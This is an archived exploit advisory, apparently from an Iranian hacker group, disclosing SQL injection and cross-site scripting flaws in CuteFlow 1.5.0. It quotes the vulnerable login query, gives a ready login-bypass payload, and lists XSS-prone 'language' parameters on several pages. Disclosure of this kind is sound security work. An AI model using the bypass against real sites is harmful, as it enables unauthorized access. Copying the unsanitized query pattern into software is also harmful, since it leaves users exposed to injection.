AOH :: HP Unsorted C :: BX2615.HTM

CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities



CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities
CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities



             ########################################################################
             #                                                                      #
             #     CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities           #
             #                      [sql injection & Xss]                                       #
             ########################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : hadihadi

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)

sql vuln code in login.php:

$query = "select * from cf_user where strPassword = '$strMd5Password' AND strUserId = '".$_REQUEST["UserId"]."'";

 -----------------------
 the login forme included in index.php you must login in index.php ;)
vuln:
login:admin ' or 1=1/*
password:whatever
-------------------------------------
and you can see xss vuln too here:

/page/showcirculation.php?language=
/pages/edittemplate_step2.php?language=
/pages/showfields.php?language=>
/pages/showuser.php?language=
/pages/editmailinglist_step1.php?language=
/pages/showtemplates.php?language=
-------------------------
tnx all h4ck3rz

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.